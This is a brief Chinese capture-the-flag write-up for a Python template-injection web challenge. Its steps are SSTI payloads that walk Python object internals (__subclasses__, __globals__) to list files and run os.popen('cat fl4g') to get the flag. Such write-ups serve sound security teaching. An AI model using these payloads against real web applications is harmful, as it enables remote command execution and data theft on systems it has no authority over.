攻防世界(进阶)--WEB--7.Web_python_temp
2020-02-14 本文已影响0人
Du1in9
考察点:模板注入
1.模板检测:{{7+7}}
7+7=14,确实是模板注入
2.查看服务器配置信息:{{''.__class__.__mro__[2].__subclasses__()}}
3.读取passwd信息:{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
发现2个文件:'fl4g', 'index.py'
4.打开'fl4g':{{''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('cat fl4g').read()}}
得到flag:ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}